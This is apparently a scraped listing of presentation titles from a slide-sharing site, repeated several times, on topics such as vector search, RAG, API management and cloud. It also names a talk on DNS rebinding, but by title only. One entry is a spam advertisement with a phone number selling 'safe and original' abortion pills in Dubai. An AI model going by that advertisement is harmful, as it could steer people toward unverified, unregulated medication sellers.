Vector Search -An Introduction in Oracle Database 23ai.pptxVector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxRemote DBA Services
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Angeliki Cooney
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoffsammart93
 
WSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native ApplicationsWSO2
 

Dernier (20)

Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)Introduction to Multilingual Retrieval Augmented Generation (RAG)
Introduction to Multilingual Retrieval Augmented Generation (RAG)
 
Exploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with MilvusExploring Multimodal Embeddings with Milvus
Exploring Multimodal Embeddings with Milvus
 
Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...Apidays New York 2024 - The value of a flexible API Management solution for O...
Apidays New York 2024 - The value of a flexible API Management solution for O...
 
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
Apidays New York 2024 - Accelerating FinTech Innovation by Vasa Krishnan, Fin...
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
AWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of TerraformAWS Community Day CPH - Three problems of Terraform
AWS Community Day CPH - Three problems of Terraform
 
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
+971581248768>> SAFE AND ORIGINAL ABORTION PILLS FOR SALE IN DUBAI AND ABUDHA...
 
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdfRising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
Rising Above_ Dubai Floods and the Fortitude of Dubai International Airport.pdf
 
Corporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptxCorporate and higher education May webinar.pptx
Corporate and higher education May webinar.pptx
 
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
Web Form Automation for Bonterra Impact Management (fka Social Solutions Apri...
 
Why Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire businessWhy Teams call analytics are critical to your entire business
Why Teams call analytics are critical to your entire business
 
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers:  A Deep Dive into Serverless Spatial Data and FMECloud Frontiers:  A Deep Dive into Serverless Spatial Data and FME
Cloud Frontiers: A Deep Dive into Serverless Spatial Data and FME
 
MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024MINDCTI Revenue Release Quarter One 2024
MINDCTI Revenue Release Quarter One 2024
 
Artificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : UncertaintyArtificial Intelligence Chap.5 : Uncertainty
Artificial Intelligence Chap.5 : Uncertainty
 
Vector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptxVector Search -An Introduction in Oracle Database 23ai.pptx
Vector Search -An Introduction in Oracle Database 23ai.pptx
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
Biography Of Angeliki Cooney | Senior Vice President Life Sciences | Albany, ...
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
 
WSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering DevelopersWSO2's API Vision: Unifying Control, Empowering Developers
WSO2's API Vision: Unifying Control, Empowering Developers
 
Architecting Cloud Native Applications
Architecting Cloud Native ApplicationsArchitecting Cloud Native Applications
Architecting Cloud Native Applications
 

There's no place like 127.0.0.1 - Achieving "reliable" DNS rebinding in modern browsers